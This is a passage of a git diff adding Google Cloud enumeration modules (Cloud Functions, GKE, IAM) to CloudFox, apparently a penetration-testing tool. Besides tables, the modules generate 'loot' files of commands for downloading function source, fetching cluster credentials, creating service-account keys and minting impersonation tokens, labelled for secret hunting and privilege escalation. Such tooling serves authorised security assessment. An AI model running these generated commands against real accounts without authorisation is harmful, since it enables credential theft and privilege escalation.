fn.IngressSettings, + ) + + if fn.TriggerURL != "" { + m.LootMap["functions-commands"].Contents += fmt.Sprintf("# URL: %s\n", fn.TriggerURL) + } + + if fn.SourceLocation != "" { + m.LootMap["functions-commands"].Contents += fmt.Sprintf("# Source: %s (%s)\n", fn.SourceLocation, fn.SourceType) + } + + m.LootMap["functions-commands"].Contents += fmt.Sprintf( + "\n# Describe function:\n"+ + "gcloud functions describe %s --region=%s --project=%s --gen2\n"+ + "# Get IAM policy:\n"+ + "gcloud functions 
get-iam-policy %s --region=%s --project=%s --gen2\n"+ + "# Read logs:\n"+ + "gcloud functions logs read %s --region=%s --project=%s --gen2 --limit=50\n", + fn.Name, fn.Region, fn.ProjectID, + fn.Name, fn.Region, fn.ProjectID, + fn.Name, fn.Region, fn.ProjectID, + ) + + // HTTP invocation commands + if fn.TriggerType == "HTTP" && fn.TriggerURL != "" { + m.LootMap["functions-commands"].Contents += fmt.Sprintf( + "# Invoke (GET):\n"+ + "curl -s '%s'\n"+ + "# Invoke (POST with auth):\n"+ + "curl -s -X POST '%s' \\\n"+ + " -H 'Authorization: Bearer $(gcloud auth print-identity-token)' \\\n"+ + " -H 'Content-Type: application/json' \\\n"+ + " -d '{\"test\": \"data\"}'\n", + fn.TriggerURL, + fn.TriggerURL, + ) + } + + // Source download command + if fn.SourceType == "GCS" && fn.SourceLocation != "" { + m.LootMap["functions-commands"].Contents += fmt.Sprintf( + "# Download source:\n"+ + "gsutil cp %s ./function-source-%s.zip\n", + fn.SourceLocation, fn.Name, + ) + } + + m.LootMap["functions-commands"].Contents += "\n" + + // Environment variable names (keep separate - useful for secret hunting) + if len(fn.EnvVarNames) > 0 { + m.LootMap["functions-env-vars"].Contents += fmt.Sprintf( + "## Function: %s (Project: %s)\n", + fn.Name, fn.ProjectID, + ) + for _, varName := range fn.EnvVarNames { + m.LootMap["functions-env-vars"].Contents += fmt.Sprintf("## - %s\n", varName) + } + m.LootMap["functions-env-vars"].Contents += "\n" + } + + // Secret references (keep separate - useful for secret hunting) + if len(fn.SecretEnvVarNames) > 0 || len(fn.SecretVolumeNames) > 0 { + m.LootMap["functions-secrets"].Contents += fmt.Sprintf( + "## Function: %s (Project: %s)\n", + fn.Name, fn.ProjectID, + ) + if len(fn.SecretEnvVarNames) > 0 { + m.LootMap["functions-secrets"].Contents += "## Secret Environment Variables:\n" + for _, secretName := range fn.SecretEnvVarNames { + m.LootMap["functions-secrets"].Contents += fmt.Sprintf("## - %s\n", secretName) + } + } + if len(fn.SecretVolumeNames) > 
0 { + m.LootMap["functions-secrets"].Contents += "## Secret Volumes:\n" + for _, volName := range fn.SecretVolumeNames { + m.LootMap["functions-secrets"].Contents += fmt.Sprintf("## - %s\n", volName) + } + } + m.LootMap["functions-secrets"].Contents += "\n" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *FunctionsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Functions table with one row per IAM binding + header := []string{ + "Project Name", + "Project ID", + "Name", + "Region", + "State", + "Runtime", + "Trigger", + "URL", + "Ingress", + "Public", + "Service Account", + "VPC Connector", + "Secrets", + "IAM Role", + "IAM Member", + } + + var body [][]string + for _, fn := range m.Functions { + // Format trigger info + triggerInfo := fn.TriggerType + if fn.TriggerEventType != "" { + triggerInfo = fn.TriggerType + } + + // Format URL - no truncation + url := "-" + if fn.TriggerURL != "" { + url = fn.TriggerURL + } + + // Format VPC connector + vpcConnector := "-" + if fn.VPCConnector != "" { + vpcConnector = fn.VPCConnector + } + + // Format secrets count + secretsInfo := "-" + totalSecrets := fn.SecretEnvVarCount + fn.SecretVolumeCount + if totalSecrets > 0 { + secretsInfo = fmt.Sprintf("%d", totalSecrets) + } + + // Format service account - no truncation + serviceAccount := fn.ServiceAccount + if serviceAccount == "" { + serviceAccount = "-" + } + + // If function has IAM bindings, create one row per binding + if len(fn.IAMBindings) > 0 { + for _, binding := range fn.IAMBindings { + body = append(body, []string{ + m.GetProjectName(fn.ProjectID), + fn.ProjectID, + fn.Name, + fn.Region, + fn.State, + fn.Runtime, + triggerInfo, + url, + fn.IngressSettings, + boolToYesNo(fn.IsPublic), + serviceAccount, + vpcConnector, + secretsInfo, + binding.Role, + binding.Member, + }) + } + } else { + // Function has no IAM bindings - single row + body = append(body, []string{ + 
m.GetProjectName(fn.ProjectID), + fn.ProjectID, + fn.Name, + fn.Region, + fn.State, + fn.Runtime, + triggerInfo, + url, + fn.IngressSettings, + boolToYesNo(fn.IsPublic), + serviceAccount, + vpcConnector, + secretsInfo, + "-", + "-", + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{} + if len(body) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_FUNCTIONS_MODULE_NAME, + Header: header, + Body: body, + }) + } + + output := FunctionsOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_FUNCTIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/gke.go b/gcp/commands/gke.go new file mode 100644 index 00000000..ebeb5599 --- /dev/null +++ b/gcp/commands/gke.go @@ -0,0 +1,342 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + GKEService "github.com/BishopFox/cloudfox/gcp/services/gkeService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPGKECommand = &cobra.Command{ + Use: globals.GCP_GKE_MODULE_NAME, + Aliases: []string{"kubernetes", "k8s", "clusters"}, + Short: "Enumerate GKE clusters with security analysis", + Long: `Enumerate GKE clusters across projects with comprehensive 
security analysis. + +Features: +- Lists all GKE clusters accessible to the authenticated user +- Analyzes security configuration (private clusters, authorized networks, RBAC) +- Identifies clusters with public API endpoints +- Shows workload identity configuration +- Detects common misconfigurations (legacy ABAC, basic auth, no network policy) +- Enumerates node pools with service accounts and OAuth scopes +- Shows Binary Authorization status +- Shows GKE Autopilot vs Standard mode +- Shows Config Connector and Istio/ASM status +- Shows maintenance window and exclusions +- Generates kubectl and gcloud commands for further analysis + +Security Columns: +- Private: Whether the cluster uses private nodes (no public IPs) +- MasterAuth: Master authorized networks enabled +- NetworkPolicy: Kubernetes network policy controller enabled +- WorkloadIdentity: GKE Workload Identity configured +- ShieldedNodes: Shielded GKE nodes enabled +- BinAuth: Binary Authorization enabled +- Autopilot: GKE Autopilot mode (vs Standard) +- Issues: Detected security misconfigurations + +Attack Surface: +- Public API servers are accessible from the internet +- Clusters without Workload Identity use node service accounts +- Default service accounts may have excessive permissions +- Legacy ABAC allows broader access than RBAC +- Autopilot clusters have reduced attack surface +- Binary Authorization prevents untrusted container images`, + Run: runGCPGKECommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type GKEModule struct { + gcpinternal.BaseGCPModule + + Clusters []GKEService.ClusterInfo + NodePools []GKEService.NodePoolInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type GKEOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o GKEOutput) TableFiles() []internal.TableFile { return o.Table } +func (o 
GKEOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPGKECommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_GKE_MODULE_NAME) + if err != nil { + return + } + + module := &GKEModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Clusters: []GKEService.ClusterInfo{}, + NodePools: []GKEService.NodePoolInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *GKEModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_GKE_MODULE_NAME, m.processProject) + + if len(m.Clusters) == 0 { + logger.InfoM("No GKE clusters found", globals.GCP_GKE_MODULE_NAME) + return + } + + // Count public clusters + publicCount := 0 + for _, cluster := range m.Clusters { + if !cluster.PrivateCluster && !cluster.MasterAuthorizedOnly { + publicCount++ + } + } + + msg := fmt.Sprintf("Found %d cluster(s), %d node pool(s)", len(m.Clusters), len(m.NodePools)) + if publicCount > 0 { + msg += fmt.Sprintf(" [%d with public API endpoint]", publicCount) + } + logger.SuccessM(msg, globals.GCP_GKE_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *GKEModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating GKE clusters in project: %s", projectID), globals.GCP_GKE_MODULE_NAME) + } + + gs := GKEService.New() + clusters, nodePools, err := gs.Clusters(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, 
logger, globals.GCP_GKE_MODULE_NAME, + fmt.Sprintf("Could not enumerate GKE clusters in project %s", projectID)) + return + } + + m.mu.Lock() + m.Clusters = append(m.Clusters, clusters...) + m.NodePools = append(m.NodePools, nodePools...) + + for _, cluster := range clusters { + m.addClusterToLoot(cluster) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d cluster(s) in project %s", len(clusters), projectID), globals.GCP_GKE_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *GKEModule) initializeLootFiles() { + m.LootMap["gke-commands"] = &internal.LootFile{ + Name: "gke-commands", + Contents: "# GKE Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *GKEModule) addClusterToLoot(cluster GKEService.ClusterInfo) { + m.LootMap["gke-commands"].Contents += fmt.Sprintf( + "# Cluster: %s (%s)\n"+ + "# Project: %s\n"+ + "gcloud container clusters describe %s --location=%s --project=%s\n"+ + "gcloud container clusters get-credentials %s --location=%s --project=%s\n"+ + "gcloud container node-pools list --cluster=%s --location=%s --project=%s\n\n"+ + "# kubectl commands (after getting credentials):\n"+ + "kubectl cluster-info\n"+ + "kubectl get nodes -o wide\n"+ + "kubectl get namespaces\n"+ + "kubectl auth can-i --list\n\n", + cluster.Name, cluster.Location, + cluster.ProjectID, + cluster.Name, cluster.Location, cluster.ProjectID, + cluster.Name, cluster.Location, cluster.ProjectID, + cluster.Name, cluster.Location, cluster.ProjectID, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Clusters table - merged with config columns, removed Issues + clusterHeader := []string{ + "Project Name", + "Project ID", + "Name", + "Location", + "Endpoint", + "Status", + "Version", + "Mode", + "Private", + 
"MasterAuth", + "NetPolicy", + "WorkloadID", + "Shielded", + "BinAuth", + "Release Channel", + "ConfigConnector", + } + + var clusterBody [][]string + for _, cluster := range m.Clusters { + // Cluster mode + clusterMode := "Standard" + if cluster.Autopilot { + clusterMode = "Autopilot" + } + + // Release channel + releaseChannel := cluster.ReleaseChannel + if releaseChannel == "" || releaseChannel == "UNSPECIFIED" { + releaseChannel = "-" + } + + // Endpoint display + endpoint := cluster.Endpoint + if endpoint == "" { + endpoint = "-" + } + + clusterBody = append(clusterBody, []string{ + m.GetProjectName(cluster.ProjectID), + cluster.ProjectID, + cluster.Name, + cluster.Location, + endpoint, + cluster.Status, + cluster.CurrentMasterVersion, + clusterMode, + boolToYesNo(cluster.PrivateCluster), + boolToYesNo(cluster.MasterAuthorizedOnly), + boolToYesNo(cluster.NetworkPolicy), + boolToYesNo(cluster.WorkloadIdentity != ""), + boolToYesNo(cluster.ShieldedNodes), + boolToYesNo(cluster.BinaryAuthorization), + releaseChannel, + boolToYesNo(cluster.ConfigConnector), + }) + } + + // Node pools table - no truncation on service account, added Cloud Platform Scope column + nodePoolHeader := []string{ + "Project Name", + "Project ID", + "Cluster", + "Node Pool", + "Machine Type", + "Node Count", + "Service Account", + "Cloud Platform Scope", + "Auto Upgrade", + "Secure Boot", + "Preemptible", + } + + var nodePoolBody [][]string + for _, np := range m.NodePools { + // No truncation on service account + saDisplay := np.ServiceAccount + if saDisplay == "" { + saDisplay = "-" + } + + nodePoolBody = append(nodePoolBody, []string{ + m.GetProjectName(np.ProjectID), + np.ProjectID, + np.ClusterName, + np.Name, + np.MachineType, + fmt.Sprintf("%d", np.NodeCount), + saDisplay, + boolToYesNo(np.HasCloudPlatformScope), + boolToYesNo(np.AutoUpgrade), + boolToYesNo(np.SecureBoot), + boolToYesNo(np.Preemptible || np.Spot), + }) + } + + // Collect loot files + var lootFiles []internal.LootFile 
+ for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files - only 2 tables now + tableFiles := []internal.TableFile{} + + if len(clusterBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "gke-clusters", + Header: clusterHeader, + Body: clusterBody, + }) + } + + if len(nodePoolBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "gke-node-pools", + Header: nodePoolHeader, + Body: nodePoolBody, + }) + } + + output := GKEOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_GKE_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/iam.go b/gcp/commands/iam.go index 4c8b3139..3d8d8bc6 100644 --- a/gcp/commands/iam.go +++ b/gcp/commands/iam.go @@ -1,122 +1,685 @@ package commands import ( + "context" "fmt" + "strings" + "sync" IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" ) var GCPIAMCommand = &cobra.Command{ Use: globals.GCP_IAM_MODULE_NAME, - Aliases: []string{}, - Short: "Display GCP IAM information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display IAM principals and their roles information within GCP resources: -cloudfox gcp iam`, + Aliases: []string{"roles"}, + Short: "Enumerate GCP IAM principals across organizations, folders, and projects", + Long: `Enumerate GCP IAM principals and 
their role bindings across the entire hierarchy. + +Features: +- Enumerates IAM bindings at organization, folder, and project levels +- Shows role assignments per principal with scope information +- Enumerates service accounts with key information +- Lists custom roles with their permissions +- Identifies groups and their role assignments +- Detects high-privilege roles and public access +- Shows conditional IAM policies with details +- Attempts to retrieve MFA status for users (requires Admin SDK) +- Generates gcloud commands for privilege escalation testing`, Run: runGCPIAMCommand, } -// Results struct for IAM command that implements the internal.OutputInterface -type GCPIAMResults struct { - Data []IAMService.PrincipalWithRoles +// High-privilege roles that should be flagged +var highPrivilegeRoles = map[string]bool{ + // Owner/Editor + "roles/owner": true, + "roles/editor": true, + // IAM Admin roles + "roles/iam.securityAdmin": true, + "roles/iam.serviceAccountAdmin": true, + "roles/iam.serviceAccountKeyAdmin": true, + "roles/iam.serviceAccountTokenCreator": true, + "roles/iam.serviceAccountUser": true, + "roles/iam.workloadIdentityUser": true, + "roles/iam.roleAdmin": true, + // Resource Manager roles + "roles/resourcemanager.projectIamAdmin": true, + "roles/resourcemanager.folderAdmin": true, + "roles/resourcemanager.folderIamAdmin": true, + "roles/resourcemanager.organizationAdmin": true, + // Compute roles + "roles/compute.admin": true, + "roles/compute.instanceAdmin": true, + "roles/compute.osAdminLogin": true, + // Storage roles + "roles/storage.admin": true, + // Functions/Run roles + "roles/cloudfunctions.admin": true, + "roles/cloudfunctions.developer": true, + "roles/run.admin": true, + "roles/run.developer": true, + // Secret Manager + "roles/secretmanager.admin": true, + // Container/Kubernetes + "roles/container.admin": true, + "roles/container.clusterAdmin": true, + // BigQuery + "roles/bigquery.admin": true, + // Deployment Manager + 
"roles/deploymentmanager.editor": true, + // Cloud Build + "roles/cloudbuild.builds.editor": true, + // Service Usage + "roles/serviceusage.serviceUsageAdmin": true, + // Org Policy + "roles/orgpolicy.policyAdmin": true, +} + +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type IAMModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields - using enhanced data + ScopeBindings []IAMService.ScopeBinding + ServiceAccounts []IAMService.ServiceAccountInfo + CustomRoles []IAMService.CustomRole + Groups []IAMService.GroupInfo + MFAStatus map[string]*IAMService.MFAStatus + LootMap map[string]*internal.LootFile + mu sync.Mutex + + // Member to groups mapping (email -> list of group emails) + MemberToGroups map[string][]string + + // Organization info for output path + OrgIDs []string + OrgNames map[string]string +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type IAMOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o IAMOutput) TableFiles() []internal.TableFile { return o.Table } +func (o IAMOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPIAMCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_IAM_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module instance + module := &IAMModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ScopeBindings: []IAMService.ScopeBinding{}, + ServiceAccounts: []IAMService.ServiceAccountInfo{}, + CustomRoles: []IAMService.CustomRole{}, + Groups: []IAMService.GroupInfo{}, + MFAStatus: make(map[string]*IAMService.MFAStatus), + LootMap: make(map[string]*internal.LootFile), + MemberToGroups: 
make(map[string][]string), + OrgIDs: []string{}, + OrgNames: make(map[string]string), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *IAMModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Enumerating IAM across organizations, folders, and projects...", globals.GCP_IAM_MODULE_NAME) + + // Use the enhanced IAM enumeration + iamService := IAMService.New() + iamData, err := iamService.CombinedIAMEnhanced(ctx, m.ProjectIDs, m.ProjectNames) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, "Failed to enumerate IAM") + return + } + + m.ScopeBindings = iamData.ScopeBindings + m.ServiceAccounts = iamData.ServiceAccounts + m.CustomRoles = iamData.CustomRoles + m.Groups = iamData.Groups + m.MFAStatus = iamData.MFAStatus + + // Try to enumerate group memberships to build reverse lookup + enrichedGroups := iamService.GetGroupMemberships(ctx, m.Groups) + m.Groups = enrichedGroups + + // Build member-to-groups reverse mapping + for _, group := range enrichedGroups { + if group.MembershipEnumerated { + for _, member := range group.Members { + if member.Email != "" { + m.MemberToGroups[member.Email] = append(m.MemberToGroups[member.Email], group.Email) + } + } + } + } + + // Generate loot + m.generateLoot() + + // Count scopes and track org IDs + orgCount, folderCount, projectCount := 0, 0, 0 + scopeSeen := make(map[string]bool) + for _, sb := range m.ScopeBindings { + key := sb.ScopeType + ":" + sb.ScopeID + if !scopeSeen[key] { + scopeSeen[key] = true + switch sb.ScopeType { + case "organization": + orgCount++ + m.OrgIDs = append(m.OrgIDs, sb.ScopeID) + m.OrgNames[sb.ScopeID] = sb.ScopeName + case "folder": + folderCount++ + case "project": + projectCount++ + } + } + } + + 
logger.SuccessM(fmt.Sprintf("Found %d binding(s) across %d org(s), %d folder(s), %d project(s); %d SA(s), %d custom role(s), %d group(s)", + len(m.ScopeBindings), orgCount, folderCount, projectCount, + len(m.ServiceAccounts), len(m.CustomRoles), len(m.Groups)), globals.GCP_IAM_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *IAMModule) initializeLootFiles() { + m.LootMap["iam-commands"] = &internal.LootFile{ + Name: "iam-commands", + Contents: "# GCP IAM Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *IAMModule) generateLoot() { + // Track unique service accounts we've seen + sasSeen := make(map[string]bool) + + for _, sb := range m.ScopeBindings { + if sb.MemberType != "ServiceAccount" { + continue + } + if sasSeen[sb.MemberEmail] { + continue + } + sasSeen[sb.MemberEmail] = true + + // Check for high privilege roles + isHighPriv := highPrivilegeRoles[sb.Role] + + if isHighPriv { + m.LootMap["iam-commands"].Contents += fmt.Sprintf( + "# Service Account: %s [HIGH PRIVILEGE] (%s)\n", + sb.MemberEmail, sb.Role, + ) + } else { + m.LootMap["iam-commands"].Contents += fmt.Sprintf( + "# Service Account: %s\n", + sb.MemberEmail, + ) + } + + // Use project scope if available, otherwise use first project + projectID := sb.ScopeID + if sb.ScopeType != "project" && len(m.ProjectIDs) > 0 { + projectID = m.ProjectIDs[0] + } + + m.LootMap["iam-commands"].Contents += fmt.Sprintf( + "gcloud iam service-accounts describe %s --project=%s\n"+ + "gcloud iam service-accounts keys list --iam-account=%s --project=%s\n"+ + "gcloud iam service-accounts get-iam-policy %s --project=%s\n"+ + "gcloud iam service-accounts keys create ./key.json --iam-account=%s --project=%s\n"+ + "gcloud auth print-access-token --impersonate-service-account=%s\n\n", + sb.MemberEmail, projectID, + sb.MemberEmail, projectID, + sb.MemberEmail, projectID, + sb.MemberEmail, projectID, 
+ sb.MemberEmail, + ) + } + + // Add service accounts with keys + for _, sa := range m.ServiceAccounts { + if sa.HasKeys { + m.LootMap["iam-commands"].Contents += fmt.Sprintf( + "# Service Account with Keys: %s (Keys: %d)\n"+ + "gcloud iam service-accounts keys list --iam-account=%s --project=%s\n\n", + sa.Email, sa.KeyCount, sa.Email, sa.ProjectID, + ) + } + } + + // Add custom roles + for _, role := range m.CustomRoles { + m.LootMap["iam-commands"].Contents += fmt.Sprintf( + "# Custom Role: %s (%d permissions)\n"+ + "gcloud iam roles describe %s --project=%s\n\n", + role.Title, role.PermissionCount, + extractRoleName(role.Name), role.ProjectID, + ) + } +} + +// extractRoleName extracts the role name from full path +func extractRoleName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// FederatedIdentityInfo contains parsed information about a federated identity +type FederatedIdentityInfo struct { + IsFederated bool + ProviderType string // AWS, GitHub, GitLab, OIDC, SAML, Azure, etc. 
+ PoolName string + Subject string + Attribute string +} + +// parseFederatedIdentity detects and parses federated identity principals +// Federated identities use principal:// or principalSet:// format +func parseFederatedIdentity(identity string) FederatedIdentityInfo { + info := FederatedIdentityInfo{} + + // Check for principal:// or principalSet:// format + if !strings.HasPrefix(identity, "principal://") && !strings.HasPrefix(identity, "principalSet://") { + return info + } + + info.IsFederated = true + + // Parse the principal URL + // Format: principal://iam.googleapis.com/projects/{project}/locations/global/workloadIdentityPools/{pool}/subject/{subject} + // Or: principalSet://iam.googleapis.com/projects/{project}/locations/global/workloadIdentityPools/{pool}/attribute.{attr}/{value} + + // Extract pool name if present + if strings.Contains(identity, "workloadIdentityPools/") { + parts := strings.Split(identity, "workloadIdentityPools/") + if len(parts) > 1 { + poolParts := strings.Split(parts[1], "/") + if len(poolParts) > 0 { + info.PoolName = poolParts[0] + } + } + } + + // Detect provider type based on common patterns in pool names and attributes + identityLower := strings.ToLower(identity) + + switch { + case strings.Contains(identityLower, "aws") || strings.Contains(identityLower, "amazon"): + info.ProviderType = "AWS" + case strings.Contains(identityLower, "github"): + info.ProviderType = "GitHub" + case strings.Contains(identityLower, "gitlab"): + info.ProviderType = "GitLab" + case strings.Contains(identityLower, "azure") || strings.Contains(identityLower, "microsoft"): + info.ProviderType = "Azure" + case strings.Contains(identityLower, "okta"): + info.ProviderType = "Okta" + case strings.Contains(identityLower, "bitbucket"): + info.ProviderType = "Bitbucket" + case strings.Contains(identityLower, "circleci"): + info.ProviderType = "CircleCI" + case strings.Contains(identity, "attribute."): + // Has OIDC attributes but unknown provider + 
info.ProviderType = "OIDC" + case strings.Contains(identity, "/subject/"): + // Has subject but unknown provider type + info.ProviderType = "Federated" + default: + info.ProviderType = "Federated" + } + + // Extract subject if present + if strings.Contains(identity, "/subject/") { + parts := strings.Split(identity, "/subject/") + if len(parts) > 1 { + info.Subject = parts[1] + } + } + + // Extract attribute and value if present + // Format: .../attribute.{attr}/{value} + if strings.Contains(identity, "/attribute.") { + parts := strings.Split(identity, "/attribute.") + if len(parts) > 1 { + attrParts := strings.Split(parts[1], "/") + if len(attrParts) >= 1 { + info.Attribute = attrParts[0] + } + if len(attrParts) >= 2 { + // The value is the specific identity (e.g., repo name) + info.Subject = attrParts[1] + } + } + } + + return info +} + +// formatFederatedInfo formats federated identity info for display +func formatFederatedInfo(info FederatedIdentityInfo) string { + if !info.IsFederated { + return "-" + } + + result := info.ProviderType + + // Show subject (specific identity like repo/workflow) if available + if info.Subject != "" { + result += ": " + info.Subject + } else if info.Attribute != "" { + result += " [" + info.Attribute + "]" + } + + // Add pool name in parentheses + if info.PoolName != "" { + result += " (pool: " + info.PoolName + ")" + } + + return result } -// TableFiles formats the data for table output, CSV & JSON files -func (g GCPIAMResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +// formatCondition formats a condition for display +func formatCondition(condInfo *IAMService.IAMCondition) string { + if condInfo == nil { + return "No" + } + // Build a meaningful condition summary + parts := []string{} + + if condInfo.Title != "" { + parts = append(parts, condInfo.Title) + } + + // Parse common condition patterns from expression + expr := condInfo.Expression + if expr != "" { + // Check for time-based conditions + 
if strings.Contains(expr, "request.time") { + if strings.Contains(expr, "timestamp") { + parts = append(parts, "[time-limited]") + } + } + // Check for resource-based conditions + if strings.Contains(expr, "resource.name") { + parts = append(parts, "[resource-scoped]") + } + // Check for IP-based conditions + if strings.Contains(expr, "origin.ip") || strings.Contains(expr, "request.origin") { + parts = append(parts, "[IP-restricted]") + } + // Check for device policy + if strings.Contains(expr, "device") { + parts = append(parts, "[device-policy]") + } + } + + if len(parts) == 0 { + return "Yes" + } + + return strings.Join(parts, " ") +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *IAMModule) writeOutput(ctx context.Context, logger internal.Logger) { + // New table structure with Scope Type/ID/Name header := []string{ - "Name", - "Principal Type", + "Scope Type", + "Scope ID", + "Scope Name", + "Entry Type", + "Identity", "Role", - "PolicyResourceType", - "PolicyResourceID", + "High Privilege", + "Custom Role", + "Has Keys", + "Condition", + "MFA", + "Groups", + "Federated", } var body [][]string + publicAccessFound := false + saWithKeys := 0 + highPrivCount := 0 + + // Add scope bindings (one row per binding) + for _, sb := range m.ScopeBindings { + isHighPriv := "No" + if highPrivilegeRoles[sb.Role] { + isHighPriv = "Yes" + highPrivCount++ + } + + isCustom := "No" + if sb.IsCustom { + isCustom = "Yes" + } - for _, principal := range g.Data { - for _, binding := range principal.PolicyBindings { - body = append(body, []string{ - principal.Name, - principal.Type, - binding.Role, - principal.ResourceType, - principal.ResourceID, - }) + // Format condition + condition := "No" + if sb.HasCondition { + condition = formatCondition(sb.ConditionInfo) } + + // Check for public access + if sb.MemberType == "PUBLIC" || sb.MemberType == "ALL_AUTHENTICATED" { + publicAccessFound = true + } + + // Get MFA status + mfa := 
"-" + if sb.MemberType == "User" { + if status, ok := m.MFAStatus[sb.MemberEmail]; ok { + if status.Error != "" { + mfa = "Unknown" + } else if status.HasMFA { + mfa = "Yes" + } else { + mfa = "No" + } + } + } else if sb.MemberType == "ServiceAccount" { + mfa = "N/A" + } + + // Get groups this member belongs to + groups := "-" + if memberGroups, ok := m.MemberToGroups[sb.MemberEmail]; ok && len(memberGroups) > 0 { + groups = strings.Join(memberGroups, ", ") + } + + // Check for federated identity + federated := formatFederatedInfo(parseFederatedIdentity(sb.MemberEmail)) + + body = append(body, []string{ + sb.ScopeType, + sb.ScopeID, + sb.ScopeName, + sb.MemberType, + sb.MemberEmail, + sb.Role, + isHighPriv, + isCustom, + "-", + condition, + mfa, + groups, + federated, + }) } - tableFile := internal.TableFile{ - Header: header, - Body: body, - Name: globals.GCP_IAM_MODULE_NAME, + // Add service accounts + for _, sa := range m.ServiceAccounts { + hasKeys := "No" + if sa.HasKeys { + hasKeys = "Yes" + saWithKeys++ + } + + disabled := "" + if sa.Disabled { + disabled = " (disabled)" + } + + // Get groups this SA belongs to + groups := "-" + if memberGroups, ok := m.MemberToGroups[sa.Email]; ok && len(memberGroups) > 0 { + groups = strings.Join(memberGroups, ", ") + } + + body = append(body, []string{ + "project", + sa.ProjectID, + m.GetProjectName(sa.ProjectID), + "ServiceAccountInfo", + sa.Email + disabled, + sa.DisplayName, + "-", + "-", + hasKeys, + "-", + "N/A", + groups, + "-", // Service accounts are not federated identities + }) } - 